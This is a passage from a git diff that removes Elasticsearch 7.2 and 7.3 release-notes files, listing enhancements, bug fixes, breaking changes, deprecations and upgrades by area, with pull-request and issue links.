{es-issue}29872[#29872]) - -Infra/Core:: -* Validate non-secure settings are not in keystore {es-pull}42209[#42209] (issue: {es-issue}41831[#41831]) -* Implement XContentParser.genericMap and XContentParser.genericMapOrdered methods {es-pull}42059[#42059] -* Remove manual parsing of JVM options {es-pull}41962[#41962] (issue: {es-issue}30684[#30684]) -* Clarify some ToXContent implementations behaviour {es-pull}41000[#41000] (issue: {es-issue}16347[#16347]) -* Remove String interning from `o.e.index.Index`. {es-pull}40350[#40350] (issue: {es-issue}40263[#40263]) -* Do not swallow exceptions in TimedRunnable {es-pull}39856[#39856] (issue: {es-issue}36137[#36137]) - -Infra/Logging:: -* Reduce garbage from allocations in DeprecationLogger {es-pull}38780[#38780] (issues: {es-issue}35754[#35754], {es-issue}37411[#37411], {es-issue}37530[#37530]) - -Infra/Packaging:: -* Clearer error message - installing windows service {es-pull}33804[#33804] - -Infra/Resiliency:: -* Limit max direct memory size to half of heap size {es-pull}42006[#42006] (issues: {es-issue}41954[#41954], {es-issue}41962[#41962]) - -Infra/Scripting:: -* Add implicit this for class binding in Painless {es-pull}40285[#40285] -* Whitelist geo methods for Painless {es-pull}40180[#40180] (issue: {es-issue}24946[#24946]) - -Machine Learning:: -* Improve message misformation error in file structure finder {es-pull}42175[#42175] -* Improve hard_limit audit message {es-pull}42086[#42086] (issue: {es-issue}38034[#38034]) -* Add validation that rejects duplicate detectors in PutJobAction {es-pull}40967[#40967] (issue: {es-issue}39704[#39704]) -* Add created_by info to usage stats {es-pull}40518[#40518] (issue: {es-issue}38403[#38403]) -* Data frame transforms config HLRC objects {es-pull}39691[#39691] -* Use scaling thread pool and xpack.ml.max_open_jobs cluster-wide dynamic {es-pull}39320[#39320] (issue: {es-issue}29809[#29809]) -* Add task recovery on node change {es-pull}39416[#39416] -* Stop tasks on failure {es-pull}39203[#39203] -* Add _preview endpoint {es-pull}38924[#38924] -* Use hardened compiler options to build 3rd party libraries {ml-pull}453[#453] -* Only select more complex trend models for forecasting if there is evidence that they are needed -{ml-pull}463[#463] -* Improve residual model selection {ml-pull}468[#468] -* Stop linking to libcrypt on Linux {ml-pull}480[#480] -* Improvements to hard_limit audit message {ml-pull}486[#486] -* Increase maximum forecast interval from 8 weeks to a limit based on the amount -of data seen, up to a maximum of 10 years {ml-pull}214[#214] and -{es-pull}41082[#41082] (issue: {es-issue}41103[#41103]) - -Mapping:: -* Updates max dimensions for sparse_vector and dense_vector to 1024. {es-pull}40597[#40597] (issue: {es-issue}40492[#40492]) -* Add ignore_above in ICUCollationKeywordFieldMapper {es-pull}40414[#40414] (issue: {es-issue}40413[#40413]) -* Adding a soft limit to the field name length. Closes #33651 {es-pull}40309[#40309] (issue: {es-issue}33651[#33651]) - -Network:: -* Update ciphers for TLSv1.3 and JDK11 if available {es-pull}42082[#42082] (issues: {es-issue}38646[#38646], {es-issue}41385[#41385], {es-issue}41808[#41808]) -* Show SSL usage when security is not disabled {es-pull}40672[#40672] (issue: {es-issue}37433[#37433]) -* Optimize Bulk Message Parsing and Message Length Parsing {es-pull}39634[#39634] (issue: {es-issue}39286[#39286]) -* Netty transport accept plaintext connections {es-pull}39532[#39532] (issue: {es-issue}39531[#39531]) -* Chunk + Throttle Netty Writes {es-pull}39286[#39286] - -Ranking:: -* Improve error message for ln/log with negative results in function score {es-pull}41609[#41609] (issue: {es-issue}41509[#41509]) - -Recovery:: -* Peer recovery should flush at the end {es-pull}41660[#41660] (issues: {es-issue}33888[#33888], {es-issue}39588[#39588], {es-issue}40024[#40024]) -* Peer recovery should not indefinitely retry on mapping error {es-pull}41099[#41099] (issue: {es-issue}40913[#40913]) -* Init global checkpoint after copy commit in peer recovery {es-pull}40823[#40823] (issue: {es-issue}33888[#33888]) -* Ensure sendBatch not called recursively {es-pull}39988[#39988] - -Reindex:: -* Reindex from Remote allow date math {es-pull}40303[#40303] (issue: {es-issue}23533[#23533]) - -SQL:: -* Implement IIF(, , ) {es-pull}41420[#41420] (issue: {es-issue}40917[#40917]) -* Use field caps inside DESCRIBE TABLE as well {es-pull}41377[#41377] (issue: {es-issue}34071[#34071]) -* Implement CURRENT_TIME/CURTIME functions {es-pull}40662[#40662] (issue: {es-issue}40648[#40648]) -* Polish behavior of SYS TABLES command {es-pull}40535[#40535] (issue: {es-issue}40348[#40348]) -* Adjust the precision and scale for drivers {es-pull}40467[#40467] (issue: {es-issue}40357[#40357]) -* Polish parsing of CAST expression {es-pull}40428[#40428] -* Fix classpath discovery on Java 10+ {es-pull}40420[#40420] (issue: {es-issue}40388[#40388]) -* Spec tests now use classpath discovery {es-pull}40388[#40388] (issue: {es-issue}40358[#40358]) -* Implement `::` cast operator {es-pull}38774[#38774] (issue: {es-issue}38717[#38717]) - -Search:: -* Fix range query edge cases {es-pull}41160[#41160] (issue: {es-issue}40937[#40937]) -* Add stopword support to IntervalBuilder {es-pull}39637[#39637] -* Shortcut counts on exists queries {es-pull}39570[#39570] (issue: {es-issue}37475[#37475]) -* Completion suggestions to be reduced once instead of twice {es-pull}39255[#39255] -* Rename SearchRequest#withLocalReduction {es-pull}39108[#39108] -* Tie break search shard iterator comparisons on cluster alias {es-pull}38853[#38853] -* Clean up ShardSearchLocalRequest {es-pull}38574[#38574] -* Handle unmapped fields in _field_caps API {es-pull}34071[#34071] -* Make 0 as invalid value for `min_children` in `has_child` query {es-pull}33073[#33073] (issue: {es-issue}32949[#32949]) -* Analyze numbers, dates and ips with a whitespace analyzer in text queries {es-pull}27395[#27395] -* Add date and date_nanos conversion to the numeric_type sort option {es-pull}40199[#40199] -* Add `use_field` option to intervals query {es-pull}40157[#40157] -* Add overlapping, before, after filters to intervals query {es-pull}38999[#38999] - -Security:: -* Support concurrent refresh of refresh tokens {es-pull}38382[#38382] (issue: {es-issue}36872[#36872]) - -Snapshot/Restore:: -* Remove IndexShard dependency from Repository {es-pull}42213[#42213] -* Add shared access signature authentication support {es-pull}42117[#42117] -* Support multiple repositories in get snapshot request {es-pull}41799[#41799] (issue: {es-issue}41210[#41210]) -* Implement Bulk Deletes for GCS Repository {es-pull}41368[#41368] (issue: {es-issue}40322[#40322]) -* Add Bulk Delete Api to BlobStore {es-pull}40322[#40322] (issues: {es-issue}40144[#40144], {es-issue}40250[#40250]) -* Async Snapshot Repository Deletes {es-pull}40144[#40144] (issues: {es-issue}39656[#39656], {es-issue}39657[#39657]) -* Allow snapshotting replicated closed indices {es-pull}39644[#39644] (issue: {es-issue}33888[#33888]) -* Add support for S3 intelligent tiering (#38836) {es-pull}39376[#39376] (issue: {es-issue}38836[#38836]) - -Store:: -* Log missing file exception when failing to read metadata snapshot {es-pull}32920[#32920] - -Suggesters:: -* Tie-break completion suggestions with same score and surface form {es-pull}39564[#39564] - - - -[[bug-7.2.0]] -[discrete] -=== Bug fixes - -Aggregations:: -* Update error message for allowed characters in aggregation names {es-pull}41573[#41573] (issue: {es-issue}41567[#41567]) -* Fix FiltersAggregation NPE when `filters` is empty {es-pull}41459[#41459] (issue: {es-issue}41408[#41408]) -* Fix unmapped field handling in the composite aggregation {es-pull}41280[#41280] - -Allocation:: -* Avoid bubbling up failures from a shard that is recovering {es-pull}42287[#42287] (issues: {es-issue}30919[#30919], {es-issue}40107[#40107]) -* Changed the position of reset counter {es-pull}39678[#39678] (issue: {es-issue}39546[#39546]) - -Analysis:: -* Always use IndexAnalyzers in analyze transport action {es-pull}40769[#40769] (issue: {es-issue}29021[#29021]) -* Fix anaylze NullPointerException when AnalyzeTokenList tokens is null {es-pull}39332[#39332] -* Fix anaylze NullPointerException when AnalyzeTokenList tokens is null {es-pull}39180[#39180] - -Authentication:: -* Refresh remote JWKs on all errors {es-pull}42850[#42850] -* Fix refresh remote JWKS logic {es-pull}42662[#42662] -* Fix settings prefix for realm truststore password {es-pull}42336[#42336] (issues: {es-issue}30241[#30241], {es-issue}41663[#41663]) -* Merge claims from userinfo and ID Token correctly {es-pull}42277[#42277] -* Do not refresh realm cache unless required {es-pull}42169[#42169] (issue: {es-issue}35218[#35218]) -* Amend `prepareIndexIfNeededThenExecute` for security token refresh {es-pull}41697[#41697] -* Fix token Invalidation when retries exhausted {es-pull}39799[#39799] - -Authorization:: -* _cat/indices with Security, hide names when wildcard {es-pull}38824[#38824] (issue: {es-issue}37190[#37190]) - -CCR:: -* CCR should not replicate private/internal settings {es-pull}43067[#43067] (issue: {es-issue}41268[#41268]) - -CRUD:: -* Fix NPE when rejecting bulk updates {es-pull}42923[#42923] - -Cluster Coordination:: -* Reset state recovery after successful recovery {es-pull}42576[#42576] (issue: {es-issue}39172[#39172]) -* Omit non-masters in ClusterFormationFailureHelper {es-pull}41344[#41344] - -Data Frame:: -* Rewrite start and stop to answer with acknowledged {es-pull}42589[#42589] (issue: {es-issue}42450[#42450]) -* Set DF task state to stopped when stopping {es-pull}42516[#42516] (issue: {es-issue}42441[#42441]) -* Add support for fixed_interval, calendar_interval, remove interval {es-pull}42427[#42427] (issues: {es-issue}33727[#33727], {es-issue}42297[#42297]) - -Distributed:: -* Avoid loading retention leases while writing them {es-pull}42620[#42620] (issue: {es-issue}41430[#41430]) -* Do not use ifSeqNo for update requests on mixed cluster {es-pull}42596[#42596] (issue: {es-issue}42561[#42561]) -* Prevent order being lost for _nodes API filters {es-pull}42045[#42045] (issue: {es-issue}41885[#41885]) -* Ensure flush happen before closing an index {es-pull}40184[#40184] (issue: {es-issue}36342[#36342]) - -Engine:: -* Account soft deletes for committed segments {es-pull}43126[#43126] (issue: {es-issue}43103[#43103]) -* Fix assertion error when caching the result of a search in a read-only index {es-pull}41900[#41900] (issue: {es-issue}41795[#41795]) -* Close and acquire commit during reset engine fix {es-pull}41584[#41584] (issue: {es-issue}38561[#38561]) - -Features/ILM:: -* Make ILM force merging best effort {es-pull}43246[#43246] (issues: {es-issue}42824[#42824], {es-issue}43245[#43245]) -* Narrow period of Shrink action in which ILM prevents stopping {es-pull}43254[#43254] (issue: {es-issue}43253[#43253]) - -Features/Indices APIs:: -* Add pre-upgrade check to test cluster routing allocation is enabled {es-pull}39340[#39340] (issue: {es-issue}39339[#39339]) - -Features/Ingest:: -* Build local year inside DateFormat lambda {es-pull}42120[#42120] - -Features/Java High Level REST Client:: -* Fixes a bug in AnalyzeRequest.toXContent() {es-pull}42795[#42795] (issues: {es-issue}39670[#39670], {es-issue}42197[#42197]) -* StackOverflowError when calling BulkRequest#add {es-pull}41672[#41672] -* HLRC: Convert xpack methods to client side objects {es-pull}40705[#40705] (issue: {es-issue}40511[#40511]) -* Rest-High-Level-Client:fix uri encode bug when url path start with '/' {es-pull}34436[#34436] (issue: {es-issue}34433[#34433]) - -Features/Watcher:: -* NullPointerException when creating a watch with Jira action (#41922) {es-pull}42081[#42081] -* Fix minor watcher bug, unmute test, add additional debug logging {es-pull}41765[#41765] (issues: {es-issue}29893[#29893], {es-issue}30777[#30777], {es-issue}33291[#33291], {es-issue}35361[#35361]) -* Fix Watcher deadlock that can cause in-abilty to index documents. {es-pull}41418[#41418] (issue: {es-issue}41390[#41390]) - -Geo:: -* Improve error message when polygons contains twice the same point in no-consecutive position {es-pull}41051[#41051] (issue: {es-issue}40998[#40998]) - -Highlighting:: -* Bug fix for AnnotatedTextHighlighter - port of 39525 {es-pull}39749[#39749] (issue: {es-issue}39525[#39525]) - -Infra/Core:: -* Fix roundUp parsing with composite patterns {es-pull}43080[#43080] (issue: {es-issue}42835[#42835]) -* scheduleAtFixedRate would hang {es-pull}42993[#42993] (issue: {es-issue}38441[#38441]) -* Only ignore IOException when fsyncing on dirs {es-pull}42972[#42972] (issue: {es-issue}42950[#42950]) -* Fix node close stopwatch usage {es-pull}41918[#41918] -* Make ISO8601 date parser accept timezone when time does not have seconds {es-pull}41896[#41896] -* Allow unknown task time in QueueResizingEsTPE {es-pull}41810[#41810] (issue: {es-issue}41448[#41448]) -* Parse composite patterns using ClassicFormat.parseObject {es-pull}40100[#40100] (issue: {es-issue}39916[#39916]) - -Infra/Packaging:: -* Don't create tempdir for cli scripts {es-pull}41913[#41913] (issue: {es-issue}34445[#34445]) -* Cleanup plugin bin directories {es-pull}41907[#41907] (issue: {es-issue}18109[#18109]) -* Update lintian overrides {es-pull}41561[#41561] (issue: {es-issue}17185[#17185]) -* Resolve JAVA_HOME at windows service install time {es-pull}39714[#39714] (issue: {es-issue}30720[#30720]) - -Infra/Settings:: -* Handle UTF-8 values in the keystore {es-pull}39496[#39496] -* Handle empty input in AddStringKeyStoreCommand {es-pull}39490[#39490] (issue: {es-issue}39413[#39413]) - -Machine Learning:: -* Fix possible race condition when closing an opening job {es-pull}42506[#42506] -* Exclude analysis fields with core field names from anomaly results {es-pull}41093[#41093] (issue: {es-issue}39406[#39406]) - -Mapping:: -* Fix possible NPE in put mapping validators {es-pull}43000[#43000] (issue: {es-issue}37675[#37675]) -* Fix merging of text field mappers {es-pull}40627[#40627] -* Fix an off-by-one error in the vector field dimension limit. {es-pull}40489[#40489] -* Fix not Recognizing Disabled Object Mapper {es-pull}39862[#39862] (issue: {es-issue}39456[#39456]) -* Avoid copying the field alias lookup structure unnecessarily. {es-pull}39726[#39726] -* Handle NaNs when detrending seasonal components {ml-pull}408[#408] - -Network:: -* Don't require TLS for single node clusters {es-pull}42826[#42826] -* Handle WRAP ops during SSL read {es-pull}41611[#41611] -* SSLDriver can transition to CLOSED in handshake {es-pull}41458[#41458] -* Handle Bulk Requests on Write Threadpool {es-pull}40866[#40866] (issues: {es-issue}39128[#39128], {es-issue}39658[#39658]) - -Percolator:: -* Fixed ignoring name parameter for percolator queries {es-pull}42598[#42598] (issue: {es-issue}40405[#40405]) - -Recovery:: -* Use translog to estimate number of operations in recovery {es-pull}42211[#42211] (issue: {es-issue}38904[#38904]) -* Recovery with syncId should verify seqno infos {es-pull}41265[#41265] -* Retain history for peer recovery using leases {es-pull}39133[#39133] - -Reindex:: -* Remote reindex failure parse fix {es-pull}42928[#42928] -* Fix concurrent search and index delete {es-pull}42621[#42621] (issue: {es-issue}28053[#28053]) -* Propogate version in reindex from remote search {es-pull}42412[#42412] (issue: {es-issue}31908[#31908]) - -Rollup:: -* Fix max boundary for rollup jobs that use a delay {es-pull}42158[#42158] -* Cleanup exceptions thrown during RollupSearch {es-pull}41272[#41272] (issue: {es-issue}38015[#38015]) -* Validate timezones based on rules not string comparision {es-pull}36237[#36237] (issue: {es-issue}36229[#36229]) - -SQL:: -* Fix wrong results when sorting on aggregate {es-pull}43154[#43154] (issue: {es-issue}42851[#42851]) -* Cover the Integer type when extracting values from _source {es-pull}42859[#42859] (issue: {es-issue}42858[#42858]) -* Fix precedence of `::` psql like CAST operator {es-pull}40665[#40665] - -Search:: -* Fix IntervalBuilder#analyzeText to never return `null` {es-pull}42750[#42750] (issue: {es-issue}42587[#42587]) -* Fix sorting on nested field with unmapped {es-pull}42451[#42451] (issue: {es-issue}33644[#33644]) -* Always set terminated_early if terminate_after is set in the search request {es-pull}40839[#40839] (issue: {es-issue}33949[#33949]) -* more_like_this query to throw an error if the like fields is not provided {es-pull}40632[#40632] -* Fixing 503 Service Unavailable errors during fetch phase {es-pull}39086[#39086] -* Fix IndexSearcherWrapper visibility {es-pull}39071[#39071] (issue: {es-issue}30758[#30758]) - -Snapshot/Restore:: -* Fix Azure List by Prefix Bug {es-pull}42713[#42713] -* Remove Harmful Exists Check from BlobStoreFormat {es-pull}41898[#41898] (issue: {es-issue}41882[#41882]) -* Restricts naming for repositories {es-pull}41008[#41008] (issue: {es-issue}40817[#40817]) -* SNAPSHOT: More Resilient Writes to Blob Stores {es-pull}36927[#36927] (issue: {es-issue}25281[#25281]) - -Suggesters:: -* Handle min_doc_freq in suggesters {es-pull}40840[#40840] (issue: {es-issue}16764[#16764]) - - -[[upgrade-7.2.0]] -[discrete] -=== Upgrades - -Features/Watcher:: -* Replace javax activation with jakarta activation {es-pull}40247[#40247] -* Replace java mail with jakarta mail {es-pull}40088[#40088] - -Infra/Core:: -* Update to joda time 2.10.2 {es-pull}42199[#42199] - -Network:: -* Upgrade to Netty 4.1.35 {es-pull}41499[#41499] - - - diff --git a/docs/reference/release-notes/7.3.asciidoc b/docs/reference/release-notes/7.3.asciidoc deleted file mode 100644 index b81ba78e7da..00000000000 --- a/docs/reference/release-notes/7.3.asciidoc +++ /dev/null @@ -1,609 +0,0 @@ -[[release-notes-7.3.2]] -== {es} version 7.3.2 - -Also see <>. - -[[bug-7.3.2]] -[discrete] -=== Bug fixes - -Data Frame:: -* Fix off-by-one error in checkpoint operations_behind {es-pull}46235[#46235] - -Distributed:: -* Update translog checkpoint after marking operations as persisted {es-pull}45634[#45634] (issue: {es-issue}29161[#29161]) - -Engine:: -* Handle delete document level failures {es-pull}46100[#46100] (issue: {es-issue}46083[#46083]) -* Handle no-op document level failures {es-pull}46083[#46083] - -Infra/Scripting:: -* Fix bugs in Painless SCatch node {es-pull}45880[#45880] - -Machine learning:: -* Throw an error when a datafeed needs {ccs} but it is not enabled for the node {es-pull}46044[#46044] - -SQL:: -* SQL: Fix issue with IIF function when condition folds {es-pull}46290[#46290] (issue: {es-issue}46268[#46268]) -* SQL: Fix issue with DataType for CASE with NULL {es-pull}46173[#46173] (issue: {es-issue}46032[#46032]) - -Search:: -* Multi-get requests should wait for search active {es-pull}46283[#46283] (issue: {es-issue}27500[#27500]) -* Ensure top docs optimization is fully disabled for queries with unbounded max scores. {es-pull}46105[#46105] (issue: {es-issue}45933[#45933]) - - -[[release-notes-7.3.1]] -== {es} version 7.3.1 - -Also see <>. - -[[enhancement-7.3.1]] -[discrete] -=== Enhancements - -CCR:: -* Include leases in error message when operations are no longer available {es-pull}45681[#45681] - -Infra/Core:: -* Add OCI annotations and adjust existing annotations {es-pull}45167[#45167] (issues: {es-issue}45162[#45162], {es-issue}45166[#45166]) - -Infra/Settings:: -* Normalize environment paths {es-pull}45179[#45179] (issue: {es-issue}45176[#45176]) - -Machine Learning:: -* Outlier detection should only fetch docs that have the analyzed fields {es-pull}44944[#44944] - -SQL:: -* Remove deprecated use of "interval" from date_histogram usage {es-pull}45501[#45501] (issue: {es-issue}43922[#43922]) - - -[[bug-7.3.1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Fix early termination of aggregators that run with breadth-first mode {es-pull}44963[#44963] (issue: {es-issue}44909[#44909]) - -Analysis:: -* Enable reloading of synonym_graph filters {es-pull}45135[#45135] (issue: {es-issue}45127[#45127]) - -Authentication:: -* Do not use scroll when finding duplicate API key {es-pull}45026[#45026] -* Fix broken short-circuit in getUnlicensedRealms {es-pull}44399[#44399] - -CCR:: -* Clean up ShardFollowTasks for deleted indices {es-pull}44702[#44702] (issue: {es-issue}34404[#34404]) - -CRUD:: -* Allow _update on write alias {es-pull}45318[#45318] (issue: {es-issue}31520[#31520]) - -Data Frame:: -* Fix starting a batch {dataframe-transform} after stopping at runtime -{es-pull}45340[#45340] (issues: {es-issue}44219[#44219], {es-issue}45339[#45339]) -* Fix null aggregation handling in indexer {es-pull}45061[#45061] (issue: {es-issue}44906[#44906]) - -Distributed:: -* Ensure AsyncTask#isScheduled remains false after close {es-pull}45687[#45687] (issue: {es-issue}45576[#45576]) -* Fix clock used in update requests {es-pull}45262[#45262] (issue: {es-issue}45254[#45254]) -* Restore DefaultShardOperationFailedException's reason during deserialization {es-pull}45203[#45203] - -Features/Watcher:: -* Fix watcher HttpClient URL creation {es-pull}45207[#45207] (issue: {es-issue}44970[#44970]) - -Infra/Packaging:: -* Use bundled JDK in Sys V init {es-pull}45593[#45593] (issue: {es-issue}45542[#45542]) - -Infra/Settings:: -* Fix a bug with elasticsearch.common.settings.Settings.processSetting {es-pull}44047[#44047] (issue: {es-issue}43791[#43791]) - -MULTIPLE AREA LABELS:: -* Fix a bug where mappings are dropped from rollover requests. {es-pull}45411[#45411] (issue: {es-issue}45399[#45399]) -* Sparse role queries can throw an NPE {es-pull}45053[#45053] - -Machine Learning:: -* Check dest index is empty when starting {dfanalytics} {es-pull}45094[#45094] -* Catch any error thrown while closing {dfanalytics} process {es-pull}44958[#44958] -* Only trap the case where more rows are supplied to outlier detection than -expected. Previously, if rows were excluded from the {dataframe-transform} after supplying the row count in the configuration, we detected the inconsistency and -failed outlier detection. However, this situation legitimately happens in cases -where the field values are non-numeric or array valued. {ml-pull}569[#569] - -Mapping:: -* Make sure to validate the type before attempting to merge a new mapping. {es-pull}45157[#45157] (issues: {es-issue}29316[#29316], {es-issue}43012[#43012]) - -SQL:: -* Adds format parameter to range queries for constant date comparisons {es-pull}45326[#45326] (issue: {es-issue}45139[#45139]) -* Uniquely named inner_hits sections for each nested field condition {es-pull}45039[#45039] (issues: {es-issue}33080[#33080], {es-issue}44544[#44544]) -* Fix URI path being lost in case of hosted ES scenario {es-pull}44776[#44776] (issue: {es-issue}44721[#44721]) - -Search:: -* Prevent Leaking Search Tasks on Exceptions in FetchSearchPhase and DfsQueryPhase {es-pull}45500[#45500] -* Fix an NPE when requesting inner hits and _source is disabled. {es-pull}44836[#44836] (issue: {es-issue}43517[#43517]) - -Security:: -* Fix .security-* indices auto-create {es-pull}44918[#44918] -* Use system context for looking up connected nodes {es-pull}43991[#43991] (issue: {es-issue}43974[#43974]) - - - -[[upgrade-7.3.1]] -[discrete] -=== Upgrades - -Infra/Packaging:: -* Upgrade to JDK 12.0.2 {es-pull}45172[#45172] - - -[[release-notes-7.3.0]] -== {es} version 7.3.0 - -Also see <>. - - -[discrete] -=== Known issues - -* Applying deletes or updates on an index after it has been shrunk may corrupt -the index. In order to prevent this issue, it is recommended to stop shrinking -read-write indices. For read-only indices, it is recommended to force-merge -indices after shrinking, which significantly reduces the likeliness of this -corruption in the case that deletes/updates would be applied by mistake. This -bug is fixed in {es} 7.7 and later versions. More details can be found on the -https://issues.apache.org/jira/browse/LUCENE-9300[corresponding issue]. - -* Indices created in 6.x with <> and <> fields using formats -that are incompatible with java.time patterns will cause parsing errors, incorrect date calculations or wrong search results. -https://github.com/elastic/elasticsearch/pull/52555 -This is fixed in {es} 7.7 and later versions. - - -[[breaking-7.3.0]] -[discrete] -=== Breaking changes - -CCR:: -* Do not allow modify aliases on followers {es-pull}43017[#43017] (issue: {es-issue}41396[#41396]) - -Data Frame:: -* Removing format support in date_histogram group_by {es-pull}43659[#43659] - -[[breaking-java-7.3.0]] -[discrete] -=== Breaking Java changes - -Mapping:: -* Refactor put mapping request validation for reuse {es-pull}43005[#43005] (issues: {es-issue}37675[#37675], {es-issue}41396[#41396]) - -Search:: -* Refactor IndexSearcherWrapper to disallow the wrapping of IndexSearcher {es-pull}43645[#43645] - - - -[[deprecation-7.3.0]] -[discrete] -=== Deprecations - -Features/Java High Level REST Client:: -* Deprecate native code info in xpack info api {es-pull}43297[#43297] - -Mapping:: -* Deprecate support for chained multi-fields. {es-pull}41926[#41926] (issue: {es-issue}41267[#41267]) - -Network:: -* Deprecate transport profile security type setting {es-pull}43237[#43237] - -Search:: -* Deprecate CommonTermsQuery and cutoff_frequency {es-pull}42619[#42619] (issue: {es-issue}37096[#37096]) - - - -[[feature-7.3.0]] -[discrete] -=== New features - -Aggregations:: -* Adds a minimum interval to `auto_date_histogram`. {es-pull}42814[#42814] (issue: {es-issue}41757[#41757]) -* Add RareTerms aggregation {es-pull}35718[#35718] (issue: {es-issue}20586[#20586]) - -Audit:: -* Enable console audit logs for docker {es-pull}42671[#42671] (issue: {es-issue}42666[#42666]) - -Data Frame:: -* Add sync api {es-pull}41800[#41800] - -Infra/Settings:: -* Consistent Secure Settings {es-pull}40416[#40416] - -Machine Learning:: -* Machine learning data frame analytics {es-pull}43544[#43544] - -Mapping:: -* Add support for 'flattened object' fields. {es-pull}42541[#42541] (issues: {es-issue}25312[#25312], {es-issue}33003[#33003]) - -Ranking:: -* Move dense_vector and sparse_vector to module {es-pull}43280[#43280] - -SQL:: -* SQL: Add support for FROZEN indices {es-pull}41558[#41558] (issues: {es-issue}39377[#39377], {es-issue}39390[#39390]) - -Search:: -* Wildcard intervals {es-pull}43691[#43691] (issue: {es-issue}43198[#43198]) -* Add prefix intervals source {es-pull}43635[#43635] (issue: {es-issue}43198[#43198]) - - - -[[enhancement-7.3.0]] -[discrete] -=== Enhancements - -Aggregations:: -* Allocate memory lazily in BestBucketsDeferringCollector {es-pull}43339[#43339] (issue: {es-issue}43091[#43091]) -* Reduce the number of docvalues iterator created in the global ordinals fielddata {es-pull}43091[#43091] - -Analysis:: -* Return reloaded analyzers in _reload_search_ananlyzer response {es-pull}43813[#43813] (issue: {es-issue}43804[#43804]) -* Allow reloading of search time analyzers {es-pull}43313[#43313] (issue: {es-issue}29051[#29051]) -* Allow reloading of search time analyzers {es-pull}42888[#42888] (issue: {es-issue}29051[#29051]) -* Allow reloading of search time analyzers {es-pull}42669[#42669] (issue: {es-issue}29051[#29051]) - -Authentication:: -* Always attach system user to internal actions {es-pull}43468[#43468] (issue: {es-issue}42215[#42215]) -* Add kerberos grant_type to get token in exchange for Kerberos ticket {es-pull}42847[#42847] (issue: {es-issue}41943[#41943]) -* Permit API Keys on Basic License {es-pull}42787[#42787] - -Authorization:: -* Add "manage_api_key" cluster privilege {es-pull}43728[#43728] (issue: {es-issue}42020[#42020]) -* Use separate BitSet cache in Doc Level Security {es-pull}43669[#43669] (issue: {es-issue}30974[#30974]) -* Support builtin privileges in get privileges API {es-pull}42134[#42134] (issue: {es-issue}29771[#29771]) - -CCR:: -* Replicate aliases in cross-cluster replication {es-pull}41815[#41815] (issue: {es-issue}41396[#41396]) - -Cluster Coordination:: -* Ignore unknown fields if overriding node metadata {es-pull}44689[#44689] -* Add voting-only master node {es-pull}43410[#43410] (issue: {es-issue}14340[#14340]) -* Defer reroute when nodes join {es-pull}42855[#42855] -* Stop SeedHostsResolver on shutdown {es-pull}42844[#42844] -* Log leader and handshake failures by default {es-pull}42342[#42342] (issue: {es-issue}42153[#42153]) - -Data Frame:: -* Add a frequency option to transform config, default 1m {es-pull}44120[#44120] -* Add node attr to GET _stats {es-pull}43842[#43842] (issue: {es-issue}43743[#43743]) -* Add deduced mappings to _preview response payload {es-pull}43742[#43742] (issue: {es-issue}39250[#39250]) -* Add support for allow_no_match for endpoints {es-pull}43490[#43490] (issue: {es-issue}42766[#42766]) -* Add version and create_time to transform config {es-pull}43384[#43384] (issue: {es-issue}43037[#43037]) -* Have sum map to a double to prevent overflows {es-pull}43213[#43213] -* Add new pipeline field to dest config {es-pull}43124[#43124] (issue: {es-issue}43061[#43061]) -* Write a warning audit on bulk index failures {es-pull}43106[#43106] -* Add support for weighted_avg agg {es-pull}42646[#42646] - -Distributed:: -* Improve Close Index Response {es-pull}39687[#39687] (issue: {es-issue}33888[#33888]) - -Engine:: -* Use reader attributes to control term dict memory useage {es-pull}42838[#42838] (issue: {es-issue}38390[#38390]) -* Remove sort by primary term when reading soft-deletes {es-pull}43845[#43845] -* Refresh translog stats after translog trimming in NoOpEngine {es-pull}43825[#43825] (issue: {es-issue}43156[#43156]) -* Expose translog stats in ReadOnlyEngine {es-pull}43752[#43752] -* Do not use soft-deletes to resolve indexing strategy {es-pull}43336[#43336] (issues: {es-issue}35230[#35230], {es-issue}42979[#42979], {es-issue}43202[#43202]) -* Rebuild version map when opening internal engine {es-pull}43202[#43202] (issues: {es-issue}40741[#40741], {es-issue}42979[#42979]) -* Only load FST off heap if we are actually using mmaps for the term dictionary {es-pull}43158[#43158] (issue: {es-issue}43150[#43150]) -* Trim translog for closed indices {es-pull}43156[#43156] (issue: {es-issue}42445[#42445]) -* Also mmap terms index (`.tip`) files for hybridfs {es-pull}43150[#43150] (issue: {es-issue}42838[#42838]) -* Add a merge policy that prunes ID postings for soft-deleted but retained documents {es-pull}40741[#40741] - -Features/Indices APIs:: -* Remove "template" field in IndexTemplateMetadata {es-pull}42099[#42099] (issue: {es-issue}38502[#38502]) - -Features/Ingest:: -* Avoid HashMap construction on Grok non-match {es-pull}42444[#42444] -* Improve how internal representation of pipelines are updated {es-pull}42257[#42257] - -Features/Java High Level REST Client:: -* Add _reload_search_analyzers endpoint to HLRC {es-pull}43733[#43733] (issue: {es-issue}43313[#43313]) -* Bulk processor concurrent requests {es-pull}41451[#41451] - -Features/Java Low Level REST Client:: -* Adapt low-level REST client to java 8 {es-pull}41537[#41537] (issue: {es-issue}38540[#38540]) - -Features/Monitoring:: -* Expand beats_system role privileges {es-pull}40876[#40876] - -Features/Watcher:: -* Improve CryptoService error message on missing secure file {es-pull}43623[#43623] (issue: {es-issue}43619[#43619]) -* Watcher: Allow to execute actions for each element in array {es-pull}41997[#41997] (issue: {es-issue}34546[#34546]) - -Infra/Core:: -* Shortcut simple patterns ending in `*` {es-pull}43904[#43904] -* Prevent merging nodes' data paths {es-pull}42665[#42665] (issue: {es-issue}42489[#42489]) -* Deprecation info for joda-java migration on 7.x {es-pull}42659[#42659] (issue: {es-issue}42010[#42010]) -* Implement XContentParser.genericMap and XContentParser.genericMapOrdered methods {es-pull}42059[#42059] - -Infra/Packaging:: -* Omit JDK sources archive from bundled JDK {es-pull}42821[#42821] - -Infra/Plugins:: -* Enable node roles to be pluggable {es-pull}43175[#43175] - -Infra/Scripting:: -* Add annotations to Painless whitelist {es-pull}43239[#43239] -* Add painless method getByPath, get value from nested collections with dotted path {es-pull}43170[#43170] (issue: {es-issue}42769[#42769]) -* Add painless method getByPath, get value from nested collections with dotted path {es-pull}43129[#43129] (issue: {es-issue}42769[#42769]) - -Machine Learning:: -* Add version and create_time to data frame analytics config {es-pull}43683[#43683] -* Improve message when native controller cannot connect {es-pull}43565[#43565] (issue: {es-issue}42341[#42341]) -* Report exponential_avg_bucket_processing_time which gives more weight to recent buckets {es-pull}43189[#43189] (issue: {es-issue}29857[#29857]) -* Adding support for geo_shape, geo_centroid, geo_point in datafeeds {es-pull}42969[#42969] (issue: 